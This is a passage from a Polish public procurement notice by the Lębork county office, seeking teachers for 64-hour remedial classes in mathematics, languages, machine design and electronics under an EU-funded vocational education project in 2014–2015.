<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.06.2014 godzina 10:00, miejsce: w Biurze Obsługi Interesanta w Starostwie Powiatowym w Lęborku, ul. Czołgistów 5, 84-300 Lębork.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn. ZaPaL się do zawodu - Zawodowo w Powiecie Lęborskim w ramach Priorytetu IX Rozwój wykształcenia i kompetencji w regionach, Działania 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zatrudnienie nauczyciela/nauczycielki w Powiatowym Centrum Edukacyjnym - Zespół Szkół Ponadgimnazjalnych w Lęborku, który opracuje autorski program nauczania na podstawie zdiagnozowanych potrzeb 8 uczniów i uczennic PCE-ZSP oraz przeprowadzi cykl 64 godzin zajęć wyrównawczych z matematyki na poziomie szkoły zawodowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:
1.	Zdiagnozowanie braków edukacyjnych 8 uczniów/uczennic skierowanych na zajęcia wyrównawcze.
2.	Opracowanie autorskiego programu nauczania na podstawie zdiagnozowanych potrzeb edukacyjnych - przekazanie dokumentu do personelu projektu.
3.	Przeprowadzenie 64 godzin zajęć wyrównawczych w zakresie matematyki w oparciu o opracowany przez nauczyciela/nauczycielkę autorski program nauczania - średnio po 2 godziny tygodniowo w okresach:
- wrzesień 2014 - grudzień 2014 = min. 24 godziny
- styczeń 2015 - czerwiec 2015 = 40 godzin

Zajęcia wyrównawcze mają za zadanie w szczególności rozwijać kompetencje kluczowe takie jak:
- kompetencje matematyczne,
- umiejętność uczenia się.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6, 80.31.00.00-0, 80.41.00.00-1, 80.50.00.00-9, 80.52.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zatrudnienie nauczyciela/nauczycielki w Powiatowym Centrum Edukacyjnym - Zespół Szkół Ponadgimnazjalnych w Lęborku, który opracuje autorski program nauczania na podstawie zdiagnozowanych potrzeb 8 uczniów i uczennic PCE-ZSP oraz przeprowadzi cykl 64 godzin zajęć wyrównawczych z języka polskiego na poziomie szkoły zawodowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:
1.	Zdiagnozowanie braków edukacyjnych 8 uczniów/uczennic skierowanych na zajęcia wyrównawcze
2.	Opracowanie autorskiego programu nauczania na podstawie zdiagnozowanych potrzeb edukacyjnych - przekazanie dokumentu do personelu projektu
3.	Przeprowadzenie 64 godzin zajęć wyrównawczych w zakresie języka polskiego w oparciu o opracowany przez nauczyciela/ nauczycielkę autorski program nauczania - średnio po 2 godziny tygodniowo w okresach:
- wrzesień 2014 - grudzień 2014 = min. 24 godziny
- styczeń 2015 - czerwiec 2015 = 40 godzin

Zajęcia wyrównawcze mają za zadanie w szczególności rozwijać kompetencje kluczowe takie jak:
- porozumiewanie się w języku ojczystym
- zdolność wyrażania i interpretowania pojęć, myśli, uczuć, faktów i opinii w mowie i piśmie
- zdolność językowej interakcji w odpowiedniej i kreatywnej formie w pełnym zakresie kontekstów społecznych i kulturowych
- umiejętność uczenia się
- kompetencje społeczne i obywatelskie
- świadomość i ekspresja kulturalna.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6, 80.31.00.00-0, 80.41.00.00-1, 80.50.00.00-9, 80.52.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> - Zatrudnienie nauczyciela/nauczycielki w Powiatowym Centrum Edukacyjnym - Zespół Szkół Ponadgimnazjalnych w Lęborku, który opracuje autorski program nauczania na podstawie zdiagnozowanych potrzeb 8 uczniów i uczennic PCE-ZSP oraz przeprowadzi cykl 64 godzin zajęć wyrównawczych z matematyki na poziomie technikum - grupa 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:
1.	Zdiagnozowanie braków edukacyjnych 8 uczniów/uczennic skierowanych na zajęcia wyrównawcze
2.	Opracowanie autorskiego programu nauczania na podstawie zdiagnozowanych potrzeb edukacyjnych - przekazanie dokumentu do personelu projektu
3.	Przeprowadzenie 64 godzin zajęć wyrównawczych w zakresie matematyki w oparciu o opracowany przez nauczyciela/ nauczycielkę autorski program nauczania - średnio po 2 godziny tygodniowo w okresach:
- wrzesień 2014 - grudzień 2014 = min. 24 godziny
- styczeń 2015 - czerwiec 2015 = 40 godzin

Zajęcia wyrównawcze mają za zadanie w szczególności rozwijać kompetencje kluczowe takie jak:
- kompetencje matematyczne,
- umiejętność uczenia się.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6, 80.31.00.00-0, 80.41.00.00-1, 80.50.00.00-9, 80.52.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zatrudnienie nauczyciela/nauczycielki w Powiatowym Centrum Edukacyjnym - Zespół Szkół Ponadgimnazjalnych w Lęborku, który opracuje autorski program nauczania na podstawie zdiagnozowanych potrzeb 8 uczniów i uczennic PCE-ZSP oraz przeprowadzi cykl 64 godzin zajęć wyrównawczych z matematyki na poziomie technikum - grupa 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:
1.	Zdiagnozowanie braków edukacyjnych 8 uczniów/uczennic skierowanych na zajęcia wyrównawcze
2.	Opracowanie autorskiego programu nauczania na podstawie zdiagnozowanych potrzeb edukacyjnych - przekazanie dokumentu do personelu projektu
3.	Przeprowadzenie 64 godzin zajęć wyrównawczych w zakresie matematyki w oparciu o opracowany przez nauczyciela/ nauczycielkę autorski program nauczania - średnio po 2 godziny tygodniowo w okresach:
- wrzesień 2014 - grudzień 2014 = min. 24 godziny
- styczeń 2015 - czerwiec 2015 = 40 godzin

Zajęcia wyrównawcze mają za zadanie w szczególności rozwijać kompetencje kluczowe takie jak:
- kompetencje matematyczne,
- umiejętność uczenia się.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6, 80.31.00.00-0, 80.41.00.00-1, 80.50.00.00-9, 80.52.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zatrudnienie nauczyciela/nauczycielki w Powiatowym Centrum Edukacyjnym - Zespół Szkół Ponadgimnazjalnych w Lęborku, który opracuje autorski program nauczania na podstawie zdiagnozowanych potrzeb 8 uczniów i uczennic PCE-ZSP oraz przeprowadzi cykl 64 godzin zajęć wyrównawczych z języka polskiego na poziomie technikum - grupa 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:
1.	Zdiagnozowanie braków edukacyjnych 8 uczniów/uczennic skierowanych na zajęcia wyrównawcze
2.	Opracowanie autorskiego programu nauczania na podstawie zdiagnozowanych potrzeb edukacyjnych - przekazanie dokumentu do personelu projektu
3.	Przeprowadzenie 64 godzin zajęć wyrównawczych w zakresie języka polskiego w oparciu o opracowany przez nauczyciela/ nauczycielkę autorski program nauczania - średnio po 2 godziny tygodniowo w okresach:
- wrzesień 2014 - grudzień 2014 = min. 24 godziny
- styczeń 2015 - czerwiec 2015 = 40 godzin

Zajęcia wyrównawcze mają za zadanie w szczególności rozwijać kompetencje kluczowe takie jak:
- porozumiewanie się w języku ojczystym
- zdolność wyrażania i interpretowania pojęć, myśli, uczuć, faktów i opinii w mowie i piśmie
- zdolność językowej interakcji w odpowiedniej i kreatywnej formie w pełnym zakresie kontekstów społecznych i kulturowych
- umiejętność uczenia się
- kompetencje społeczne i obywatelskie
- świadomość i ekspresja kulturalna.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6, 80.31.00.00-0, 80.41.00.00-1, 80.50.00.00-9, 80.52.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zatrudnienie nauczyciela/nauczycielki w Powiatowym Centrum Edukacyjnym - Zespół Szkół Ponadgimnazjalnych w Lęborku, który opracuje autorski program nauczania na podstawie zdiagnozowanych potrzeb 8 uczniów i uczennic PCE-ZSP oraz przeprowadzi cykl 64 godzin zajęć wyrównawczych z języka polskiego na poziomie technikum - grupa 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:
1.	Zdiagnozowanie braków edukacyjnych 8 uczniów/uczennic skierowanych na zajęcia wyrównawcze
2.	Opracowanie autorskiego programu nauczania na podstawie zdiagnozowanych potrzeb edukacyjnych - przekazanie dokumentu do personelu projektu
3.	Przeprowadzenie 64 godzin zajęć wyrównawczych w zakresie języka polskiego w oparciu o opracowany przez nauczyciela/ nauczycielkę autorski program nauczania - średnio po 2 godziny tygodniowo w okresach:
- wrzesień 2014 - grudzień 2014 = min. 24 godziny
- styczeń 2015 - czerwiec 2015 = 40 godzin

Zajęcia wyrównawcze mają za zadanie w szczególności rozwijać kompetencje kluczowe takie jak:
- porozumiewanie się w języku ojczystym
- zdolność wyrażania i interpretowania pojęć, myśli, uczuć, faktów i opinii w mowie i piśmie
- zdolność językowej interakcji w odpowiedniej i kreatywnej formie w pełnym zakresie kontekstów społecznych i kulturowych
- umiejętność uczenia się
- kompetencje społeczne i obywatelskie
- świadomość i ekspresja kulturalna.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6, 80.31.00.00-0, 80.41.00.00-1, 80.50.00.00-9, 80.52.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zatrudnienie nauczyciela/nauczycielki w Powiatowym Centrum Edukacyjnym - Zespół Szkół Ponadgimnazjalnych w Lęborku, który opracuje autorski program nauczania na podstawie zdiagnozowanych potrzeb 8 uczniów i uczennic PCE-ZSP oraz przeprowadzi cykl 64 godzin zajęć wyrównawczych z języka angielskiego na poziomie technikum - grupa 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:
1.	Zdiagnozowanie braków edukacyjnych 8 uczniów/uczennic skierowanych na zajęcia wyrównawcze
2.	Opracowanie autorskiego programu nauczania na podstawie zdiagnozowanych potrzeb edukacyjnych - przekazanie dokumentu do personelu projektu
3.	Przeprowadzenie 64 godzin zajęć wyrównawczych w zakresie języka angielskiego w oparciu o opracowany przez nauczyciela/ nauczycielkę autorski program nauczania - średnio po 2 godziny tygodniowo w okresach:
- wrzesień 2014 - grudzień 2014 = min. 24 godziny
- styczeń 2015 - czerwiec 2015 = 40 godzin

Zajęcia wyrównawcze mają za zadanie w szczególności rozwijać kompetencje kluczowe takie jak:
- porozumiewanie się w językach obcych,
 -umiejętność uczenia się,
 -świadomość i ekspresja kulturalna.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6, 80.31.00.00-0, 80.41.00.00-1, 80.50.00.00-9, 80.52.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zatrudnienie nauczyciela/nauczycielki w Powiatowym Centrum Edukacyjnym - Zespół Szkół Ponadgimnazjalnych w Lęborku, który opracuje autorski program nauczania na podstawie zdiagnozowanych potrzeb 8 uczniów i uczennic PCE-ZSP oraz przeprowadzi cykl 64 godzin zajęć wyrównawczych z języka angielskiego na poziomie technikum - grupa 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:
1.	Zdiagnozowanie braków edukacyjnych 8 uczniów/uczennic skierowanych na zajęcia wyrównawcze
2.	Opracowanie autorskiego programu nauczania na podstawie zdiagnozowanych potrzeb edukacyjnych - przekazanie dokumentu do personelu projektu
3.	Przeprowadzenie 64 godzin zajęć wyrównawczych w zakresie języka angielskiego w oparciu o opracowany przez nauczyciela/ nauczycielkę autorski program nauczania - średnio po 2 godziny tygodniowo w okresach:
- wrzesień 2014 - grudzień 2014 = min. 24 godziny
- styczeń 2015 - czerwiec 2015 = 40 godzin

Zajęcia wyrównawcze mają za zadanie w szczególności rozwijać kompetencje kluczowe takie jak:
- porozumiewanie się w językach obcych,
 -umiejętność uczenia się,
 -świadomość i ekspresja kulturalna.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6, 80.31.00.00-0, 80.41.00.00-1, 80.50.00.00-9, 80.52.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zatrudnienie nauczyciela/nauczycielki w Powiatowym Centrum Edukacyjnym - Zespół Szkół Ponadgimnazjalnych w Lęborku, który opracuje autorski program nauczania na podstawie z diagnozowanych potrzeb 8 uczniów i uczennic PCE-ZSP oraz przeprowadzi cykl 64 godzin zajęć wyrównawczych w zakresie języka niemieckiego na poziomie technikum - grupa 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:
1.	Zdiagnozowanie braków edukacyjnych 8 uczniów/uczennic skierowanych na zajęcia wyrównawcze
2.	Opracowanie autorskiego programu nauczania na podstawie zdiagnozowanych potrzeb edukacyjnych - przekazanie dokumentu do personelu projektu
3.	Przeprowadzenie 64 godzin zajęć wyrównawczych w zakresie języka niemieckiego w oparciu o opracowany przez nauczyciela/nauczycielkę autorski program nauczania - średnio po 2 godziny tygodniowo w okresach:
- wrzesień 2014 - grudzień 2014 = min. 24 godziny
- styczeń 2015 - czerwiec 2015 = 40 godzin

Zajęcia wyrównawcze mają za zadanie w szczególności rozwijać kompetencje kluczowe takie jak:
- porozumiewanie się w językach obcych,
 -umiejętność uczenia się,
 -świadomość i ekspresja kulturalna.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6, 80.31.00.00-0, 80.41.00.00-1, 80.50.00.00-9, 80.52.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zatrudnienie nauczyciela/nauczycielki w Powiatowym Centrum Edukacyjnym - Zespół Szkół Ponadgimnazjalnych w Lęborku, który opracuje autorski program nauczania na podstawie zdiagnozowanych potrzeb 8 uczniów i uczennic PCE-ZSP oraz przeprowadzi cykl 64 godzin zajęć wyrównawczych z języka niemieckiego na poziomie technikum - grupa 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:
1.	Zdiagnozowanie braków edukacyjnych 8 uczniów/uczennic skierowanych na zajęcia wyrównawcze
2.	Opracowanie autorskiego programu nauczania na podstawie zdiagnozowanych potrzeb edukacyjnych - przekazanie dokumentu do personelu projektu
3.	Przeprowadzenie 64 godzin zajęć wyrównawczych w zakresie języka niemieckiego w oparciu o opracowany przez nauczyciela/ nauczycielkę autorski program nauczania - średnio po 2 godziny tygodniowo w okresach:
- wrzesień 2014 - grudzień 2014 = min. 24 godziny
- styczeń 2015 - czerwiec 2015 = 40 godzin

Zajęcia wyrównawcze mają za zadanie w szczególności rozwijać kompetencje kluczowe takie jak:
- porozumiewanie się w językach obcych,
 -umiejętność uczenia się,
 -świadomość i ekspresja kulturalna.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6, 80.31.00.00-0, 80.41.00.00-1, 80.50.00.00-9, 80.52.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zatrudnienie nauczyciela/nauczycielki w Zespole Szkół Mechaniczno-Informatycznych w Lęborku, który opracuje autorski program nauczania na podstawie zdiagnozowanych potrzeb 8 uczniów i uczennic ZSMI oraz przeprowadzi cykl 64 godzin zajęć wyrównawczych Podstawy konstrukcji maszyn na poziomie szkoły zawodowej - grupa 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:
1.	Zdiagnozowanie braków edukacyjnych 8 uczniów/uczennic skierowanych na zajęcia wyrównawcze
2.	Opracowanie autorskiego programu nauczania na podstawie zdiagnozowanych potrzeb edukacyjnych - przekazanie dokumentu do personelu projektu
3.	Przeprowadzenie 64 godzin zajęć wyrównawczych w zakresie podstaw konstrukcji maszyn w oparciu o opracowany przez nauczyciela/ nauczycielkę autorski program nauczania - średnio po 2 godziny tygodniowo w okresach:
- wrzesień 2014 - grudzień 2014 = min. 24 godziny
- styczeń 2015 - czerwiec 2015 = 40 godzin

Zajęcia wyrównawcze mają za zadanie w szczególności rozwijać kompetencje kluczowe takie jak:
- kompetencje matematyczne i podstawowe kompetencje naukowo-techniczne,
- umiejętność uczenia się

Zajęcia wyrównawcze mają za zadanie w szczególności rozwijać kompetencje kluczowe/zawodowe takie jak:
- wykonywanie szkiców brył geometrycznych w rzutach prostokątnych i aksonometrycznych,
- wykonywanie szkiców typowych części maszyn i zwymiarowanie szkiców części maszyn,
- zastosowanie uproszczeń rysunkowych do wykonania szkicu części maszyny,
- odczytywanie informacji z rysunku wykonawczego, złożeniowego i schematycznego,
- wykorzystywanie technik komputerowych do sporządzania dokumentacji technicznej,
- wykonywanie działania na wektorach,
- wyznaczanie warunków równowagi płaskiego układu sił,
- obliczanie prędkości obrotowej, przyspieszenia, pracy mechanicznej, mocy, energii, sprawności,
- wyznaczanie sił tarcia tocznego i ślizgowego,
- rozróżnianie rodzajów odkształceń i naprężeń oraz wyjaśnianie pojęć naprężenia dopuszczalnego,
- obliczanie naprężenia w elementach ściskanych i rozciąganych, naprężenia gnące i skręcające dla prostych przypadków obciążenia,
- rozpoznanie podstawowych części i mechanizmów stosowanych w maszynach,
- rozróżnianie rodzajów połączeń rozłącznych i nierozłącznych,
- umiejętność wskazania zastosowania podstawowych elementów, zespołów i mechanizmów,
- umiejętność wyjaśnienia budowy i zasady działania sprzęgieł i hamulców oraz mechanizmów ruchu postępowego i obrotowego,
- zdolność posługiwania się dokumentacją techniczną..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6, 80.31.00.00-0, 80.41.00.00-1, 80.50.00.00-9, 80.52.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zatrudnienie nauczyciela/nauczycielki w Zespole Szkół Mechaniczno-Informatycznych w Lęborku, który opracuje autorski program nauczania na podstawie zdiagnozowanych potrzeb 8 uczniów i uczennic ZSMI oraz przeprowadzi cykl 64 godzin zajęć wyrównawczych Podstawy konstrukcji maszyn na poziomie szkoły zawodowej- grupa 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:
1.	Zdiagnozowanie braków edukacyjnych 8 uczniów/uczennic skierowanych na zajęcia wyrównawcze
2.	Opracowanie autorskiego programu nauczania na podstawie zdiagnozowanych potrzeb edukacyjnych - przekazanie dokumentu do personelu projektu
3.	Przeprowadzenie 64 godzin zajęć wyrównawczych w zakresie podstaw konstrukcji maszyn w oparciu o opracowany przez nauczyciela/ nauczycielkę autorski program nauczania - średnio po 2 godziny tygodniowo w okresach:
- wrzesień 2014 - grudzień 2014 = min. 24 godziny
- styczeń 2015 - czerwiec 2015 = 40 godzin

Zajęcia wyrównawcze mają za zadanie w szczególności rozwijać kompetencje kluczowe takie jak:
- kompetencje matematyczne i podstawowe kompetencje naukowo-techniczne
- umiejętność uczenia się,

Zajęcia wyrównawcze mają za zadanie w szczególności rozwijać kompetencje kluczowe/zawodowe takie jak:
- wykonywanie szkiców brył geometrycznych w rzutach prostokątnych i aksonometrycznych,
- wykonywanie szkiców typowych części maszyn i zwymiarowanie szkiców części maszyn,
- zastosowanie uproszczeń rysunkowych do wykonania szkicu części maszyny,
- odczytywanie informacji z rysunku wykonawczego, złożeniowego i schematycznego,
- wykorzystywanie technik komputerowych do sporządzania dokumentacji technicznej,
- wykonywanie działania na wektorach,
- wyznaczanie warunków równowagi płaskiego układu sił,
- obliczanie prędkości obrotowej, przyspieszenia, pracy mechanicznej, mocy, energii, sprawności,
- wyznaczanie sił tarcia tocznego i ślizgowego,
- rozróżnianie rodzajów odkształceń i naprężeń oraz wyjaśnianie pojęć naprężenia dopuszczalnego,
- obliczanie naprężenia w elementach ściskanych i rozciąganych, naprężenia gnące i skręcające dla prostych przypadków obciążenia,
- rozpoznanie podstawowych części i mechanizmów stosowanych w maszynach,
- rozróżnianie rodzajów połączeń rozłącznych i nierozłącznych,
- umiejętność wskazania zastosowania podstawowych elementów, zespołów i mechanizmów,
- umiejętność wyjaśnienia budowy i zasady działania sprzęgieł i hamulców oraz mechanizmów ruchu postępowego i obrotowego,
- zdolność posługiwania się dokumentacją techniczną..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6, 80.31.00.00-0, 80.41.00.00-1, 80.50.00.00-9, 80.52.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Zatrudnienie nauczyciela/nauczycielki w Zespole Szkół Mechaniczno-Informatycznych w Lęborku, który opracuje autorski program nauczania na podstawie zdiagnozowanych potrzeb 8 uczniów i uczennic ZSMI oraz przeprowadzi cykl 64 godzin zajęć wyrównawczych Podstawy konstrukcji maszyn na poziomie technikum- grupa 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:
1.	Zdiagnozowanie braków edukacyjnych 8 uczniów/uczennic skierowanych na zajęcia wyrównawcze
2.	Opracowanie autorskiego programu nauczania na podstawie zdiagnozowanych potrzeb edukacyjnych - przekazanie dokumentu do personelu projektu
3.	Przeprowadzenie 64 godzin zajęć wyrównawczych w zakresie podstaw konstrukcji maszyn na poziomie technikum w oparciu o opracowany przez nauczyciela/ nauczycielkę autorski program nauczania - średnio po 2 godziny tygodniowo w okresach:
- wrzesień 2014 - grudzień 2014 = min. 24 godziny
- styczeń 2015 - czerwiec 2015 = 40 godzin

Zajęcia wyrównawcze mają za zadanie w szczególności rozwijać kompetencje kluczowe takie jak:
- kompetencje matematyczne i podstawowe kompetencje naukowo-techniczne
- umiejętność uczenia się,

Zajęcia wyrównawcze mają za zadanie w szczególności rozwijać kompetencje kluczowe/zawodowe takie jak:
-obliczanie elementów konstrukcyjnych narażonych na: rozciąganie i ściskanie, ścinanie, nacisk powierzchniowy, wyznaczyć momenty gnące i siły tnące dla belki zginanej,
- umiejętność scharakteryzowania i skonstruowania połączenia rozłącznego i nierozłącznego,
- umiejętność wskazania wpływów przyjętych rozwiązań konstrukcyjnych na wytrzymałość zmęczeniową części maszyny,
- umiejętność zaprojektowania wału maszynowego wraz z ułożyskowaniem,
- umiejętność zaprojektowania koła pasowego na pasy klinowe i koło łańcuchowe,
- umiejętność zaprojektowania przekładni zębatej, dobrania przekładni zębatej do podanego zastosowania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6, 80.31.00.00-0, 80.41.00.00-1, 80.50.00.00-9, 80.52.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Zatrudnienie nauczyciela/nauczycielki w Zespole Szkół Mechaniczno-Informatycznych w Lęborku, który opracuje autorski program nauczania na podstawie zdiagnozowanych potrzeb 8 uczniów i uczennic ZSMI oraz przeprowadzi cykl 64 godzin zajęć Podstawy konstrukcji maszyn na poziomie technikum- grupa 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:
1.	Zdiagnozowanie braków edukacyjnych 8 uczniów/uczennic skierowanych na zajęcia wyrównawcze
2.	Opracowanie autorskiego programu nauczania na podstawie zdiagnozowanych potrzeb edukacyjnych - przekazanie dokumentu do personelu projektu
3.	Przeprowadzenie 64 godzin zajęć wyrównawczych w zakresie podstaw konstrukcji maszyn na poziomie technikum w oparciu o opracowany przez nauczyciela/ nauczycielkę autorski program nauczania - średnio po 2 godziny tygodniowo w okresach:
- wrzesień 2014 - grudzień 2014 = min. 24 godziny
- styczeń 2015 - czerwiec 2015 = 40 godzin

Zajęcia wyrównawcze mają za zadanie w szczególności rozwijać kompetencje kluczowe takie jak:
- kompetencje matematyczne i podstawowe kompetencje naukowo-techniczne
- umiejętność uczenia się,

Zajęcia wyrównawcze mają za zadanie w szczególności rozwijać kompetencje kluczowe/zawodowe takie jak:
-obliczanie elementów konstrukcyjnych narażonych na: rozciąganie i ściskanie, ścinanie, nacisk powierzchniowy, wyznaczyć momenty gnące i siły tnące dla belki zginanej,
- umiejętność scharakteryzowania i skonstruowania połączenia rozłącznego i nierozłącznego,
- umiejętność wskazania wpływów przyjętych rozwiązań konstrukcyjnych na wytrzymałość zmęczeniową części maszyny,
- umiejętność zaprojektowania wału maszynowego wraz z ułożyskowaniem,
- umiejętność zaprojektowania koła pasowego na pasy klinowe i koło łańcuchowe,
- umiejętność zaprojektowania przekładni zębatej, dobrania przekładni zębatej do podanego zastosowania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6, 80.31.00.00-0, 80.41.00.00-1, 80.50.00.00-9, 80.52.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Zatrudnienie nauczyciela/nauczycielki w Zespole Szkół Mechaniczno-Informatycznych w Lęborku, który opracuje autorski program nauczania na podstawie zdiagnozowanych potrzeb 8 uczniów i uczennic ZSMI oraz przeprowadzi cykl 64 godzin zajęć wyrównawczych Elektronika i elektrotechnika na poziomie szkoły zawodowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:
1.	Zdiagnozowanie braków edukacyjnych 8 uczniów/uczennic skierowanych na zajęcia wyrównawcze
